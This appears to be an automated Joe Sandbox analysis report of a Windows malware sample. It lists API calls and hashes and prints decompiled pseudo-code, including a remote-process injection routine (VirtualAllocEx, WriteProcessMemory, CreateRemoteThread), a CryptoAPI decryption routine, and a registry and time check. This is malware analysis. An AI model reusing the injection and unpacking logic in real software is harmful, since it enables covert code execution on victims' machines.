                                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                          • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                          • Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00401291
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040129C), ref: 00401033
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __getmainargs.MSVCRT ref: 00401070
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__fmode.MSVCRT ref: 0040107E
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: __p__environ.MSVCRT ref: 00401098
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _cexit.MSVCRT ref: 004010BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 004010C3
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 004010F1
                                                                                                                                                                                                                                                                            • Part of subcall function 00401000: _setmode.MSVCRT ref: 00401105
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode__set_app_type_cexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 250851222-0
                                                                                                                                                                                                                                                                          • Opcode ID: abc5d16dfd36cc051d66f1b0a71e802486b709e19d00ad8df8ac84728067cb69
                                                                                                                                                                                                                                                                          • Instruction ID: 96c7857dd54b44c3e5074d738f37285bc9a5d07ca86cb9ffb3dbd1875c70a5b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abc5d16dfd36cc051d66f1b0a71e802486b709e19d00ad8df8ac84728067cb69
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C0123400820957C1007B79AE0B6087AEC5700305F81057CE48566296D974A41547EB
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 1000182F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                          			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                          				long** _t35;
                                                                                                                                                                                                                                                                          				char* _t52;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                                                                                          						_t32 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t32;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t32 != 0) {
                                                                                                                                                                                                                                                                          							_t34 = _a16;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                          							if(_t34 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_t35 =  &_v24;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                          								if(_t35 != 0) {
                                                                                                                                                                                                                                                                          									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04008cf6
                                                                                                                                                                                                                                                                          0x04008d01
                                                                                                                                                                                                                                                                          0x04008e1a
                                                                                                                                                                                                                                                                          0x04008e20
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d35
                                                                                                                                                                                                                                                                          0x04008d3f
                                                                                                                                                                                                                                                                          0x04008d47
                                                                                                                                                                                                                                                                          0x04008d49
                                                                                                                                                                                                                                                                          0x04008d4f
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d6d
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d82
                                                                                                                                                                                                                                                                          0x04008d99
                                                                                                                                                                                                                                                                          0x04008da1
                                                                                                                                                                                                                                                                          0x04008da5
                                                                                                                                                                                                                                                                          0x04008db1
                                                                                                                                                                                                                                                                          0x04008db9
                                                                                                                                                                                                                                                                          0x04008dbb
                                                                                                                                                                                                                                                                          0x04008dc2
                                                                                                                                                                                                                                                                          0x04008dd5
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008df7
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008d82

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                          					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                          							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                          							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                          								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04002516
                                                                                                                                                                                                                                                                          0x04002521
                                                                                                                                                                                                                                                                          0x040026c2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002531
                                                                                                                                                                                                                                                                          0x0400253a
                                                                                                                                                                                                                                                                          0x0400254b
                                                                                                                                                                                                                                                                          0x04002554
                                                                                                                                                                                                                                                                          0x0400256a
                                                                                                                                                                                                                                                                          0x04002571
                                                                                                                                                                                                                                                                          0x04002596
                                                                                                                                                                                                                                                                          0x0400259d
                                                                                                                                                                                                                                                                          0x040025d7
                                                                                                                                                                                                                                                                          0x040025e6
                                                                                                                                                                                                                                                                          0x040025eb
                                                                                                                                                                                                                                                                          0x040025ee
                                                                                                                                                                                                                                                                          0x04002600
                                                                                                                                                                                                                                                                          0x0400263c
                                                                                                                                                                                                                                                                          0x04002641
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x0400264e
                                                                                                                                                                                                                                                                          0x04002670
                                                                                                                                                                                                                                                                          0x04002692
                                                                                                                                                                                                                                                                          0x04002698
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x0400267d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002683
                                                                                                                                                                                                                                                                          0x040025b6
                                                                                                                                                                                                                                                                          0x040025bd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025d0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002573

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                          			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                          				intOrPtr* _v72;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                                                          				short* _t69;
                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          					_v12 = _t58;
                                                                                                                                                                                                                                                                          					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                          					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                          					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                          					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                          						_v48 = 0x10;
                                                                                                                                                                                                                                                                          						_v44 = 0x10;
                                                                                                                                                                                                                                                                          						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                          							_v72 =  &_v64;
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                          							_t91 = _v72;
                                                                                                                                                                                                                                                                          							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                          							_t68 = _t101;
                                                                                                                                                                                                                                                                          							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                          							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                          							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                          							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                          							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                          							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                          							_t70 = E04009910();
                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                          							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                          							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
